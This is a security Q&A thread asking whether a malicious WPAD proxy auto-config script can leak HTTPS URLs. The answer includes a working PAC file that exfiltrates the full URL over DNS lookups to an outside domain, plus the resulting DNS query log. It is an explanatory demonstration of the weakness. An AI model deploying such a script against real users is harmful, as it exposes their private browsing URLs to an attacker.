# Can Web Proxy Autodiscovery leak HTTPS URLs?

Tags: tls, proxy

The [WPAD](http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol) protocol can in some circumstances allow an attacker to get clients to use a malicious [PAC](http://en.wikipedia.org/wiki/Proxy_auto-config) script.

It appears to be well documented, that this can be used to perform MITM-attacks on HTTP traffic. However I don't see any discussion on the impact on HTTPS traffic.

As far as I can tell, it does not permit for a full MITM-attack on the HTTPS traffic since the PAC script can only direct the browser to which proxy to use, but there will still be an end-to-end SSL connection between the client and the legitimate server.

However one of the arguments for the `FindProxyForURL` function provided by the attacker is the full URL. Moreover `FindProxyForURL` can trigger DNS lookups.

Can an attacker utilize this to leak HTTPS URLs? If not, what protection is in place to prevent such leaks?

Comment: I'm not 100% certain, but the URL path isn't sent to anything but the server that serves the page (except in HTTP referrer headers, etc). One can however watch the subdomain lookups.

Comment: @Natanael The URL is given to the `FindProxyForURL` function. This is also explained in the link in my question: http://en.wikipedia.org/wiki/Proxy_auto-config

What would stop the script from sending this URL to an attacker?

Comment: There is a [Defcon talk](https://www.youtube.com/watch?v=fSt3pNzr79E) about this which even references this exact SecSE question.

Answer (score 5):

Yes, URL is passed to `FindProxyForURL()` and you can leak it out via DNS. Here is an example of PAC file:

```
function FindProxyForURL(url, host) {
    if (host == 'navalny.com') {
        var chunks = url.match(/[-a-zA-Z0-9]+/g);
        dnsResolve('x.darkk.net.ru.');
        if (chunks) {
            chunks.forEach(function(x) {
                dnsResolve(x + '.y.darkk.net.ru');
            });
        }
        dnsResolve('z.darkk.net.ru.');
        return 'SOCKS5 127.0.0.1:1024'; // drop connection
    }
    return 'DIRECT';
}
```

If Firefox/39.0 navigates to `https://navalny.com/the-capability-url?q=q` while this PAC file is active following DNS queries are sent:

```
Standard query 0xfb5d  A x.darkk.net.ru
Standard query 0x9ca7  AAAA x.darkk.net.ru
Standard query 0xf1cc  A x.darkk.net.ru
Standard query 0xf60c  AAAA x.darkk.net.ru
Standard query 0x574a  A https.y.darkk.net.ru
Standard query 0xfad9  AAAA https.y.darkk.net.ru
Standard query 0x2289  A https.y.darkk.net.ru
Standard query 0x7ed4  AAAA https.y.darkk.net.ru
Standard query 0x85b2  A navalny.y.darkk.net.ru
Standard query 0xa7cd  AAAA navalny.y.darkk.net.ru
Standard query 0x1ca9  A navalny.y.darkk.net.ru
Standard query 0xa400  AAAA navalny.y.darkk.net.ru
Standard query 0xec51  A com.y.darkk.net.ru
Standard query 0x1ea7  AAAA com.y.darkk.net.ru
Standard query 0x25bd  A the-capability-url.y.darkk.net.ru
Standard query 0x844c  AAAA the-capability-url.y.darkk.net.ru
Standard query 0x200b  A q.y.darkk.net.ru
Standard query 0x5a62  AAAA q.y.darkk.net.ru
Standard query 0xeb02  A q.y.darkk.net.ru
Standard query 0xaa2c  AAAA q.y.darkk.net.ru
Standard query 0xee8f  A z.darkk.net.ru
Standard query 0xe9b7  AAAA z.darkk.net.ru
```